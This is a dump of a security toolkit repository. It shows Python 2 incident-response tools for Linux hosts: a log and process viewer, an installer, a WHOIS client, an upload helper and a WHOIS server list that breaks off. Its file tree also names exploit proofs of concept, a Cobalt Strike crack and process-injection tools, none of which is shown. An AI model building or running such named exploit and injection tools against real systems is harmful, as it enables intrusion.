├── .gitignore ├── Emergency ├── Linux │ ├── README.md │ ├── emergency.py │ ├── install.sh │ ├── mywhois.py │ ├── postfile.py │ ├── tldconfig.conf │ └── virustotal.py └── Windows │ └── CVE-2024-38077_Check.bat ├── LICENSE ├── LogTools ├── AccessLogAnylast.py ├── core │ ├── AccessApi.py │ ├── AccessCount.py │ ├── AccessDetail.py │ ├── AccessFreeze.py │ ├── AccessWebshell.py │ └── __init__.py └── settings │ ├── __init__.py │ └── settings.py ├── ManagementTools └── WorkSchedule.py ├── POCS ├── HadoopYarnRCE.py ├── NexusRCE.py └── hfs_get_shell.py ├── PacketTools ├── PacketStruct │ ├── PacketStruct.py │ └── __init__.py ├── PcapSniffer │ └── sniffer.py ├── ProtocolAnylast │ ├── Application │ │ └── HttpAnylast.py │ ├── Ethernet │ │ ├── EthernetAnylast.py │ │ └── __init__.py │ ├── IPNetwork │ │ ├── IPAnylast.py │ │ └── __init__.py │ ├── Transport │ │ ├── IcmpAnylast.py │ │ ├── TcpAnylast.py │ │ ├── UdpAnylast.py │ │ └── __init__.py │ └── __init__.py └── Stream │ ├── Stream.py │ └── StreamStruct.py ├── PentestCode ├── CobaltStrikeCrack.py ├── CobaltStrikeOnlineShellcodeLoader.cs ├── PortainerWeakPasswordScanner.py ├── ProcessDLLInjection.cpp └── ProcessShellcodeInjection.cpp └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /Emergency/Linux/README.md: -------------------------------------------------------------------------------- 1 | # LinuxEmergency 2 | *** 3 | Linux下的应急工具,支持CentOS系统和RedHat系统,安装方法: 4 | ``` 5 | git clone https://github.com/cisp/LinuxEmergency.git 6 | cd LinuxEmergency 7 | sh ./install.sh 8 | ``` 9 | 10 | 要求root权限 11 | 12 | # 查看操作系统信息: 13 | *** 14 | ``` 15 | [root@centos emergency]# python emergency.py -o 16 | 17 | 内核版本 : Linux-3.10.0-514.26.2.el7.v7.4.qihoo.x86_64-x86_64-with-centos-7.2.1511-Core 18 | CORE数量 : 16 19 | CPU数量 : 16 20 | CPU使用率 : scputimes(user=1.0, nice=0.0, system=0.0, idle=15.0, iowait=0.0, irq=0.0, softirq=0.0, steal=0.0, guest=0.0, guest_nice=0.0) 21 | 内存总量 : 33736994816 22 | 内存使用率 : 5.1 23 | 24 | [root@centos emergency]# 25 | ``` 26 | 27 | # 查看内核模块信息: 
28 | *** 29 | ``` 30 | [root@centos emergency]# python emergency.py -k 31 | 内核模块 : nfnetlink_queue 来源 : 32 | 内核模块 : nfnetlink_log 来源 : 33 | 内核模块 : nfnetlink 来源 : nfnetlink_log,nfnetlink_queue 34 | 内核模块 : bluetooth 来源 : 35 | ``` 36 | 37 | # 查看所有登录成功失败的IP地址: 38 | *** 39 | ``` 40 | [root@scentos emergency]# python emergency.py -l 41 | 192.168.100.35 失败 42 | 192.168.100.31 失败 43 | 127.0.0.1 失败 44 | 192.168.100.20 成功 45 | ``` 46 | 47 | # 查看登录成功和失败日志 48 | *** 49 | ``` 50 | # 成功的 -s 51 | [root@centos emergency]# python emergency.py -s | more 52 | 账户 : emergency 时间 : 2017-08-09-11:20 来源 : (192.168.100.24) 53 | 账户 : emergency 时间 : 2017-08-09-14:34 来源 : (192.168.100.24) 54 | 账户 : root 时间 : 2017-09-28-12:38 来源 : (192.168.100.65) 55 | 账户 : root 时间 : 2017-09-28-12:46 来源 : (192.168.100.65) 56 | 账户 : root 时间 : 2017-09-28-13:13 来源 : (192.168.100.65) 57 | 58 | # 失败的 -f 59 | [root@centos emergency]# python emergency.py -f | more 60 | 账户 : emergency 时间 : 192.168.100.34 来源 : Jul-6-21:27---21:27 61 | 账户 : emergency 时间 : 192.168.100.34 来源 : Jul-6-21:25---21:25 62 | 账户 : admin 时间 : 127.0.0.1 来源 : Jul-5-15:32---15:32 63 | 64 | # 如果需要指定IP 加-i参数 ,例如 -i 192.168.100.34; 65 | 66 | ``` 67 | 68 | # 查看进程列表和详细信息 69 | ``` 70 | # 列表信息 71 | [root@centos emergency]# python emergency.py -a 72 | *********************************************************************************************************** 73 | 进程ID号: 2 进程名称: kthreadd 进程用户: root 启动时间: 2018-06-16 07:40:48 74 | CPU占比: 0.0% 内存占比: 0.0% 75 | 网络连接: 76 | *********************************************************************************************************** 77 | *********************************************************************************************************** 78 | 进程ID号: 3 进程名称: ksoftirqd/0 进程用户: root 启动时间: 2018-06-16 07:40:48 79 | CPU占比: 0.0% 内存占比: 0.0% 80 | 网络连接: 81 | *********************************************************************************************************** 82 | ... 
83 | 84 | # 详细信息 85 | [root@centos emergency]# python emergency.py -p 28344 86 | *********************************************************************************************************** 87 | 进程ID号: 28344 进程名称: screen 进程用户: emergency 启动时间: 2018-06-22 13:25:30 88 | 工作路径: /home/emergency/ 89 | 进程命令: SCREEN 90 | 父母进程: 1 91 | 亲子进程: [28345] 92 | CPU占比: 0.0% 内存占比: 0.0046135703802% 93 | 网络连接: 94 | 进程环境: 95 | 终端会话 : /bin/bash 96 | 安全会话 : 97 | 登录账户 : emergency 98 | 工作账户 : emergency 99 | 权限路径 : /usr/lib64/ccache:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/emergency/tools:/usr/local/bin:/usr/local/sbin:/usr/local/python3/bin:/home/emergency/.local/bin:/home/emergency/bin 100 | 用户目录 : /home/emergency 101 | 102 | *********************************************************************************************************** 103 | ``` 104 | 105 | # 添加virustotal基本查询功能 106 | ``` 107 | # 检查样本 108 | [root@centos emergency]# python vt.py -f ./LICENSE 109 | ****************************************** 110 | 检测时间: 2018-07-09 07:31:04 111 | 报毒数量: 0 112 | 报毒引擎: [] 113 | 引擎总数: 59 114 | ****************************************** 115 | 116 | # 检查URL 117 | [root@centos emergency]# python vt.py -u http://1.1.1.2/bmi/docs.autodesk.com 118 | ****************************************** 119 | 检测时间: 2018-07-09 16:33:29 120 | 关联样本: 0 121 | 关联连接: 0 122 | 关联域名: 0 123 | ****************************************** 124 | 125 | # 检查域名 126 | [root@centos emergency]# python vt.py -d baidu.com 127 | ****************************************** 128 | 检测时间: 2018-07-09 16:33:35 129 | 关联样本: 202 130 | 关联连接: 100 131 | 关联域名: 8 132 | ****************************************** 133 | 134 | # 检查IP 135 | [root@centos emergency]# python vt.py -a 114.114.114.114 136 | ****************************************** 137 | 检测时间: 2018-07-09 16:34:05 138 | 关联样本: 135 139 | 关联连接: 93 140 | 关联域名: 592 141 | ****************************************** 142 | ``` 143 | 144 | # 增加查看whois信息的功能 145 | ``` 146 | [root@centos emergency]# 
python mywhois.py -d baidu.com 147 | Domain Name: baidu.com 148 | Registry Domain ID: 11181110_DOMAIN_COM-VRSN 149 | Registrar WHOIS Server: whois.markmonitor.com 150 | Registrar URL: http://www.markmonitor.com 151 | Updated Date: 2017-07-27T19:36:28-0700 152 | Creation Date: 1999-10-11T04:05:17-0700 153 | Registrar Registration Expiration Date: 2026-10-11T00:00:00-0700 154 | Registrar: MarkMonitor, Inc. 155 | Registrar IANA ID: 292 156 | Registrar Abuse Contact Email: abusecomplaints@markmonitor.com 157 | Registrar Abuse Contact Phone: +1.2083895740 158 | Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited) 159 | Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited) 160 | Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited) 161 | Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited) 162 | Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited) 163 | Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited) 164 | Registrant Organization: Beijing Baidu Netcom Science Technology Co., Ltd. 165 | Registrant State/Province: Beijing 166 | Registrant Country: CN 167 | Admin Organization: Beijing Baidu Netcom Science Technology Co., Ltd. 168 | Admin State/Province: Beijing 169 | Admin Country: CN 170 | Tech Organization: Beijing Baidu Netcom Science Technology Co., Ltd. 
171 | Tech State/Province: Beijing 172 | Tech Country: CN 173 | Name Server: ns4.baidu.com 174 | Name Server: ns3.baidu.com 175 | Name Server: dns.baidu.com 176 | Name Server: ns2.baidu.com 177 | Name Server: ns7.baidu.com 178 | DNSSEC: unsigned 179 | URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 180 | >>> Last update of WHOIS database: 2018-07-09T02:21:59-0700 <<< 181 | 182 | If certain contact information is not shown for a Registrant, Administrative, 183 | or Technical contact, and you wish to send a message to these contacts, please 184 | send your message to whoisrelay@markmonitor.com and specify the domain name in 185 | the subject line. We will forward that message to the underlying contact. 186 | 187 | If you have a legitimate interest in viewing the non-public WHOIS details, send 188 | your request and the reasons for your request to abusecomplaints@markmonitor.com 189 | and specify the domain name in the subject line. We will review that request and 190 | may ask for supporting documentation and explanation. 191 | 192 | The Data in MarkMonitor.com's WHOIS database is provided by MarkMonitor.com for 193 | information purposes, and to assist persons in obtaining information about or 194 | related to a domain name registration record. MarkMonitor.com does not guarantee 195 | its accuracy. By submitting a WHOIS query, you agree that you will use this Data 196 | only for lawful purposes and that, under no circumstances will you use this Data to: 197 | (1) allow, enable, or otherwise support the transmission of mass unsolicited, 198 | commercial advertising or solicitations via e-mail (spam); or 199 | (2) enable high volume, automated, electronic processes that apply to 200 | MarkMonitor.com (or its systems). 201 | MarkMonitor.com reserves the right to modify these terms at any time. 202 | By submitting this query, you agree to abide by this policy. 203 | 204 | MarkMonitor is the Global Leader in Online Brand Protection. 
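 205 | 206 | MarkMonitor Domain Management(TM) 207 | MarkMonitor Brand Protection(TM) 208 | MarkMonitor AntiPiracy(TM) 209 | MarkMonitor AntiFraud(TM) 210 | Professional and Managed Services 211 | 212 | Visit MarkMonitor at http://www.markmonitor.com 213 | Contact us at +1.8007459229 214 | In Europe, at +44.02032062220 215 | 216 | For more information on Whois status codes, please visit 217 | https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en 218 | -- 219 | 220 | ``` 221 |
--------------------------------------------------------------------------------
/Emergency/Linux/emergency.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-


'''
Linux incident-response viewer for process, login and network information.

The login views shell out to `who /var/log/wtmp` and `lastb`. Those logs are
writable by root, so on a host that may already be compromised the output is
a lead to follow up, not proof that a login did or did not happen.
'''


# Dependencies
import os
import sys
import time
import psutil
import platform
from optparse import OptionParser


# Module-level functions:
def OSinfo():
    '''Print the platform string, core/CPU counts, CPU time percentages and memory totals.'''
    # Fixed: the original called psutil.cpu_count() twice with the same
    # (logical) meaning, so the "CORE" and "CPU" figures could never differ.
    # cpu_count(logical=False) may return None where psutil cannot tell.
    core_number = psutil.cpu_count(logical=False)
    cpu_number = psutil.cpu_count(logical=True)
    cpu_usage_precent = psutil.cpu_times_percent()
    # virtual_memory(): index 0 is the total, index 2 the used percentage.
    mem_info = psutil.virtual_memory()
    print '''
    内核版本 : %s
    CORE数量 : %s
    CPU数量 : %s
    CPU使用率 : %s
    内存总量 : %s
    内存使用率 : %s
    '''%(str(platform.platform()),str(core_number),str(cpu_number),str(cpu_usage_precent),str(mem_info[0]),str(mem_info[2]))

def SuccessLoginDetail():
    '''Print account, time and source for every entry reported by `who /var/log/wtmp`.'''
    try:
        successer_list = os.popen("who /var/log/wtmp | awk '{print $1,$3\"-\"$4\"\",$5}'").read().split('\n')[:-1]
    except Exception, reason:
        print "读取记录失败"
        exit(0)
    # Fixed: after the [:-1] slice an empty result is [], which the original
    # "one empty string" test never matched, so the message was never shown.
    if not successer_list or successer_list == ['']:
        print "未找到成功的登录信息"
        exit(0)
    for success in successer_list:
        info_string = success.split(" ")
        try:
            print '账户 : %s 时间 : %s 来源 : %s'%(info_string[0],info_string[1],info_string[2])
        except Exception:
            # Rows with fewer than three fields are skipped.
            continue


def FailedLoginDetail():
    '''Print account, time and source for every failed login reported by `lastb`.'''
    try:
        # The last three elements (blank line, "btmp begins ..." trailer, empty
        # string after the final newline) are not login rows.
        failer_list = os.popen("lastb | awk '{print $1,$3,$5\"-\"$6\"-\"$7\"-\"$8\"-\"$9}'").read().split('\n')[0:-3]
    except Exception, reason:
        print "读取记录失败"
        exit(0)
    # Fixed: the original tested successer_list here, a name that does not
    # exist in this function, so a single-row result raised NameError.
    if not failer_list or failer_list == ['']:
        print "未找到失败的登录信息"
        exit(0)
    for failer in failer_list:
        info_string = failer.split(" ")
        try:
            # Fixed: awk emits "user host date"; the original printed the host
            # under the time label and the date under the source label (the
            # README sample output for -f shows the swap).
            print '账户 : %s 时间 : %s 来源 : %s'%(info_string[0],info_string[2],info_string[1])
        except Exception:
            continue

def LoginIpList():
    '''Print every source address seen in failed (lastb) and successful (wtmp) logins.'''
    ipresult = []
    flag = True
    try:
        ip_failer_list = os.popen("lastb | awk '{print $3}' | sort | uniq -c | sort -k 1").read().split("\n")[2:-1]
    except Exception, reason:
        flag = False
    if flag:
        for ip in ip_failer_list:
            # Each row is "<count> <value>" as produced by uniq -c.
            ipaddress = ip.lstrip().split(' ')
            ipaddr = ipaddress[1]
            # NOTE(review): presumably filters the "btmp begins Thu ..." trailer;
            # it only works when the log happens to start on a Thursday - confirm.
            if 'Thu' in ipaddr:
                continue
            ipresult.append((ipaddr,'失败'))
    flag = True
    try:
        ip_success_list = os.popen("who /var/log/wtmp| awk '{print $5}' | sort | uniq -c | sort -k 1").read().split("\n")[:-1]
    except Exception, reason:
        flag = False
    if flag:
        if len(ip_success_list) == 0:
            pass
        else:
            for ip in ip_success_list:
                ipaddress = ip.lstrip().split(' ')
                ipaddr = ipaddress[1]
                # Values containing ':' are skipped, which also drops IPv6 sources.
                if ':' in ipaddr:
                    continue
                ipaddr = ipaddr.replace('(','').replace(')','')
                ipresult.append((ipaddr,"成功"))
    for ip in ipresult:
        print '%s %s'%(str(ip[0]),str(ip[1]))


def LoginCheckByIP(ipaddress,kind="success"):
    '''Print the login records that contain *ipaddress*.

    kind == 'success' searches `who /var/log/wtmp`; any other value searches
    `lastb`. The address is placed into a shell pipeline, so it is checked
    against a strict character set first and the process exits with status 1
    when it contains anything else.
    '''
    import re  # function-scope import: the module header does not import re
    # Fixed: the original interpolated the raw -i value into a double-quoted
    # shell string run through os.popen, typically as root. Only hex digits,
    # '.' and ':' are accepted, which covers IPv4/IPv6 addresses and prefixes.
    if not re.match(r'\A[0-9A-Fa-f.:]+\Z', ipaddress or ''):
        print "IP地址格式不正确"
        exit(1)
    # grep -F matches the address literally; with -E the dots matched any character.
    if kind == 'success':
        command = "who /var/log/wtmp | grep -F \"%s\" | awk '{print $1,$3\"-\"$4\"\",$5}'"%ipaddress
    else:
        command = "lastb | grep -F \"%s\" | awk '{print $1,$3,$5\"-\"$6\"-\"$7\"-\"$8\"-\"$9}'"%ipaddress
    try:
        _list = os.popen(command).read().split('\n')
    except Exception, reason:
        print "读取记录失败"
        exit(0)
    if len(_list) == 1 and _list[0] == '':
        print "未找到相关的登录信息"
        exit(0)
    for ip in _list:
        info_string = ip.split(" ")
        try:
            if kind == 'success':
                # who rows: user, date-time, (host)
                print '账户 : %s 时间 : %s 来源 : %s'%(info_string[0],info_string[1],info_string[2])
            else:
                # lastb rows: user, host, date - printed under the matching labels
                print '账户 : %s 时间 : %s 来源 : %s'%(info_string[0],info_string[2],info_string[1])
        except Exception:
            continue

def KernelModInfo():
    '''Print each loaded kernel module with the fourth lsmod column (the "Used by" list).'''
    result = []
    try:
        # [1:-1] drops the lsmod header row and the empty string after the last newline.
        modlist = os.popen("lsmod | awk '{print $1,$4}'").read().split('\n')[1:-1]
        for mod in modlist:
            modname = mod.split(' ')[0]
            modsource = mod.split(' ')[1]
            result.append((modname,modsource))
    except Exception, reason:
        pass
    for ret in result:
        print "内核模块 : %s 来源 : %s"%(ret[0],ret[1])


def ShowProcessInfo(pid,detail=True):
    '''Print identity, resource usage and inet connections of process *pid*.

    With detail=True the working directory, command line, parent/child PIDs
    and a few environment variables are printed as well. psutil exceptions
    (for example for a PID that no longer exists) propagate to the caller.
    '''
    process = psutil.Process(pid)
    command = ' '.join(process.cmdline())
    connections = ""
    for connection in process.connections(kind='inet'):
        laddr = connection[3]
        raddr = connection[4]
        # Fixed: a listening or unconnected socket has an empty remote address.
        # The original indexed it unconditionally, raised IndexError, and the
        # caller's blanket except then dropped the whole process from the
        # listing - so exactly the processes holding listening sockets vanished.
        # NOTE(review): stripping ':' also mangles IPv6 addresses.
        sip = laddr[0].replace(":","") if laddr else ""
        sport = laddr[1] if laddr else ""
        dip = raddr[0].replace(":","") if raddr else ""
        dport = raddr[1] if raddr else ""
        state = connection[5]
        connections += "\n SIP:%s SPORT:%s - DIP:%s DPORT:%s [%s]"%(str(sip),str(sport),str(dip),str(dport),state)
    envir = process.environ()
    evistring = """
    终端会话 : %s
    安全会话 : %s
    登录账户 : %s
    工作账户 : %s
    权限路径 : %s
    用户目录 : %s
    """%(str(envir.get("SHELL","")),str(envir.get('SECURITYSESSIONID','')),str(envir.get('LOGNAME','')),str(envir.get('USER','')),str(envir.get('PATH','')),str(envir.get('HOME','')))
    print "***********************************************************************************************************"
    print "进程ID号:",pid," 进程名称:",process.name()," 进程用户:",process.username()," 启动时间:",time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(int(process.create_time())))
    if detail:
        try:
            cwd = process.cwd()
            print "工作路径:",cwd
        except Exception:
            # The working directory may be unreadable; print the label alone.
            print "工作路径:"
        print "进程命令:",command
        print "父母进程:",process.ppid()
        print "亲子进程:",[x.pid for x in list(process.children())]
    print "CPU占比:",str(process.cpu_percent())+"%"," 内存占比:",str(process.memory_percent())+"%"
    print "网络连接:",connections
    if detail:
        print "进程环境:",evistring
    print "***********************************************************************************************************"


if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-p", "--process",dest="process",help="show process detail")
    parser.add_option("-a","--all",action='store_true',dest="all",help="show all process")
    parser.add_option("-o", "--osinfo",action='store_true',dest="osinfo",help="set search time")
    parser.add_option("-i","--ipaddress",dest="ipaddress",help="set search ipaddress")
    parser.add_option("-f","--failer",action='store_true',dest="failed",help="show failed login")
    parser.add_option("-s","--success",action='store_true',dest="successed",help="show successed login")
    parser.add_option("-l","--iplist",action='store_true',dest="iplist",help="show login ip list")
    parser.add_option("-k","--kernel",action='store_true',dest="kernel",help="show login ip list")
    (options, args) = parser.parse_args()
    if options.ipaddress not in [None,""] and options.successed:
        LoginCheckByIP(options.ipaddress,kind='success')
        exit(0)
    elif options.ipaddress not in [None,""] and options.failed:
        LoginCheckByIP(options.ipaddress,kind='failed')
        exit(0)
    if options.osinfo:
        OSinfo()
        exit(0)
    if options.iplist:
        LoginIpList()
    if options.kernel:
        KernelModInfo()
    if options.failed:
        FailedLoginDetail()
        exit(0)
    if options.successed: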
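        SuccessLoginDetail()
        exit(0)
    if options.all:
        for pid in psutil.pids():
            try:
                ShowProcessInfo(int(pid),detail=False)
            except Exception:
                pass
    else:
        if options.process != None:
            try:
                ShowProcessInfo(int(options.process))
            except Exception, reason:
                pass
--------------------------------------------------------------------------------
/Emergency/Linux/install.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Installs the third-party Python 2 modules the tools import and appends
# shell aliases for them to root's login profile.
#
# Fixed: the original also ran "pip2 install httplib" and
# "pip2 install mimetypes". Both are Python 2 standard-library modules, so
# those commands could only fetch whatever third-party package happens to be
# published under the same name - and install it as root.
# NOTE(review): the remaining installs are unpinned; pin versions (and
# hashes) before running this on a production host.
pip2 install simplejson
pip2 install psutil
path=$(pwd)
command1="alias emg='python "
# NOTE(review): this alias shadows the system whois command in root's shell.
command2="alias whois='python "
command3="alias vt='python "
files1="/emergency.py'"
files2="/mywhois.py'"
files3="/virustotal.py'"
var1="$command1$path$files1"
var2="$command2$path$files2"
var3="$command3$path$files3"
# Quoted so the alias text reaches the profile exactly as built above.
# Running the installer twice appends the aliases twice.
echo "$var1" >> /root/.bash_profile
echo "$var2" >> /root/.bash_profile
echo "$var3" >> /root/.bash_profile
# Only affects this script's own shell; open a new login shell to use the aliases.
source /root/.bash_profile
--------------------------------------------------------------------------------
/Emergency/Linux/mywhois.py:
--------------------------------------------------------------------------------
# -*- coding:UTF-8 -*-


# Dependencies
import re
import json
import socket
import datetime
from optparse import OptionParser


# Module-level state: maps a TLD (or second-level suffix) to its WHOIS server
whoisserver = {}

def config_read():
    '''Load tldconfig.conf into the module-level whoisserver mapping.

    Each line has the form "suffix:server", optionally followed by a comma.
    The first entry for a suffix wins; later duplicates are ignored.
    '''
    global whoisserver
    import os  # function-scope import: the module header does not import os
    # Fixed: the original opened "./tldconfig.conf", i.e. whatever file of
    # that name sits in the caller's working directory. The installer aliases
    # the script by absolute path, so the file is read from beside the script.
    conf_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "tldconfig.conf")
    with open(conf_path, 'r') as fr:
        for line in fr:
            # Fixed: most entries end with ',' and the original kept it as
            # part of the host name, so connecting to that server failed.
            line = line.strip().rstrip(",")
            # Fixed: blank or malformed lines raised IndexError.
            if ":" not in line:
                continue
            domain, server = line.split(":", 1)
            domain = domain.strip()
            server = server.strip()
            if domain and server and domain not in whoisserver:
                whoisserver[domain] = server


def get_whois_server(domain):
    domainlist = domain.split(".")
    tld = domainlist[-2]+"."+domainlist[-1]
    if tld in whoisserver:
        return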
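whoisserver[tld]
    else:
        tld = domainlist[-1]
        if tld in whoisserver and tld not in ['net','com']:
            return whoisserver[tld]
        else:
            con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                con.connect(('whois.verisign-grs.com',43))
            except Exception, reason:
                con.close()
                return None
            tld = domainlist[-2]+"."+domainlist[-1]
            package = '=%s\r\n'%tld
            try:
                con.send(package)
            except Exception, reason:
                con.close()
                return None
            try:
                data = con.recv(1024)
            except Exception, reason:
                con.close()
                return None
            con.close()
            _dict = data.split('\n\n')
            if data.find('No match for') >= 0:
                return None
            key = 'Domain Name: %s' %(tld.upper())
            data = [x for x in _dict if key in x]
            try:
                server = re.findall(r'Whois Server: ([A-Za-z0-9\-\_\.]*)',str(data))[0]
            except Exception, reason:
                try:
                    server = re.findall(r'WHOIS Server: ([A-Za-z0-9\-\_\.]*)',str(data))[0]
                except Exception, reason:
                    return None
            return server


def whois_check(server,domain):
    '''Query *server* on TCP port 43 for *domain* and print the reply.

    Returns 0 after printing, or None when no server was given or the
    connect, send or first receive fails.
    '''
    # The __main__ block passes the lookup result straight through, and that
    # result is None when no server could be determined.
    if not server:
        return None
    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Fixed: without a timeout an unresponsive server blocked the tool forever.
    con.settimeout(10)
    try:
        con.connect((server,43))
    except Exception, reason:
        con.close()
        return None
    package = '%s\r\n' %(domain)
    try:
        con.send(package)
    except Exception, reason:
        con.close()
        return None
    try:
        ret = con.recv(4096)
        xcount = 0
        # Keep reading until the usual trailer shows up, the peer closes the
        # connection, or six further reads have been made.
        while ret.find('For more information') < 0:
            xcount += 1
            try:
                chunk = con.recv(4096)
            except socket.timeout:
                # Keep what was already received instead of discarding it.
                break
            if not chunk:
                break
            ret += chunk
            if xcount > 5:
                break
    except Exception, reason:
        con.close()
        return None
    con.close()
    # The server name can come from a referral in another server's reply, so
    # the text is untrusted. Control bytes other than tab, CR and LF are
    # removed so the reply cannot drive the terminal with escape sequences.
    ret = re.sub(r'[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]', '', ret)
    print ret
    return 0

if __name__ == '__main__':
    parser = OptionParser("")
    parser.add_option("-d", dest="domain",help="domain to check", metavar="domain")
    (options, args) = parser.parse_args()
    config_read()
    if options.domain != None:
        server =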
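get_whois_server(options.domain)
        whois_check(server,options.domain)
    else:
        print '请输入域名!'
--------------------------------------------------------------------------------
/Emergency/Linux/postfile.py:
--------------------------------------------------------------------------------
import httplib, mimetypes

def post_multipart(host, selector, fields, files):
    """
    Post fields and files to an http host as multipart/form-data.
    fields is a sequence of (name, value) elements for regular form fields.
    files is a sequence of (name, filename, value) elements for data to be uploaded as files
    Return the server's response page.
    """
    content_type, body = encode_multipart_formdata(fields, files)
    # NOTE(review): httplib.HTTP is a plain-text connection. If callers put an
    # API key or a sample in the form data it crosses the network unencrypted -
    # confirm against the callers and prefer an HTTPS connection.
    h = httplib.HTTP(host)
    h.putrequest('POST', selector)
    h.putheader('content-type', content_type)
    h.putheader('content-length', str(len(body)))
    h.endheaders()
    h.send(body)
    # NOTE(review): the status code is read but not checked, so an error page
    # is returned to the caller like a normal response.
    errcode, errmsg, headers = h.getreply()
    return h.file.read()

def _escape_param(value):
    """Make a field or file name safe inside a quoted Content-Disposition parameter."""
    # Line breaks and double quotes are percent-encoded so the name cannot
    # close the quoted parameter or start a new header line.
    return ('%s' % value).replace('\r', '%0D').replace('\n', '%0A').replace('"', '%22')

def encode_multipart_formdata(fields, files):
    """
    fields is a sequence of (name, value) elements for regular form fields.
    files is a sequence of (name, filename, value) elements for data to be uploaded as files
    Return (content_type, body) ready for httplib.HTTP instance
    """
    import uuid  # function-scope import: the module header does not import uuid
    # Fixed: the original used one hard-coded boundary for every request. A
    # file whose bytes contain that string ends its own part early and can
    # supply extra form fields; uploaded samples are not trusted content.
    BOUNDARY = '----------' + uuid.uuid4().hex
    CRLF = '\r\n'
    L = []
    for (key, value) in fields:
        L.append('--' + BOUNDARY)
        L.append('Content-Disposition: form-data; name="%s"' % _escape_param(key))
        L.append('')
        L.append(value)
    for (key, filename, value) in files:
        L.append('--' + BOUNDARY)
        # Fixed: names were interpolated unescaped; the file name of a sample
        # under investigation is chosen by whoever created the file.
        L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (_escape_param(key), _escape_param(filename)))
        L.append('Content-Type: %s' % get_content_type(filename))
        L.append('')
        L.append(value)
    L.append('--' + BOUNDARY + '--')
    L.append('')
    body = CRLF.join(L)
    content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
    return content_type, body

def get_content_type(filename):
    """Guess the MIME type from the file name, defaulting to application/octet-stream."""
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
--------------------------------------------------------------------------------
/Emergency/Linux/tldconfig.conf:
--------------------------------------------------------------------------------
 1 | com:whois.verisign-grs.com, 2 | net:whois.verisign-grs.com, 3 | uno:whois.nic.uno, 4 | top:whois.nic.top, 5 | sx:whois.nic.sx, 6 | in:whois.inregistry.net, 7 | co:whois.nic.co, 8 | org:whois.pir.org, 9 | info:whois.afilias.info, 10 | biz:whois.neulevel.biz, 11 | us:whois.nic.us, 12 | uk:whois.nic.uk, 13 | ca:whois.cira.ca, 14 | tel:whois.nic.tel, 15 | ie:whois.iedr.ie, 16 | it:whois.nic.it, 17 | li:whois.nic.li, 18 | no:whois.norid.no, 19 | cc:whois.nic.cc, 20 | eu:whois.eu, 21 | nu:whois.nic.nu, 22 | au:whois.aunic.net, 23 | de:whois.denic.de, 24 | ws:whois.worldsite.ws, 25 | sc:whois2.afilias-grs.net, 26 | mobi:whois.dotmobiregistry.net, 27 | pro:whois.registrypro.pro, 28 | edu:whois.educause.net, 29 | tv:whois.nic.tv, 30 | travel:whois.nic.travel, 31 | name:whois.nic.name, 32 | in:whois.inregistry.net, 33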
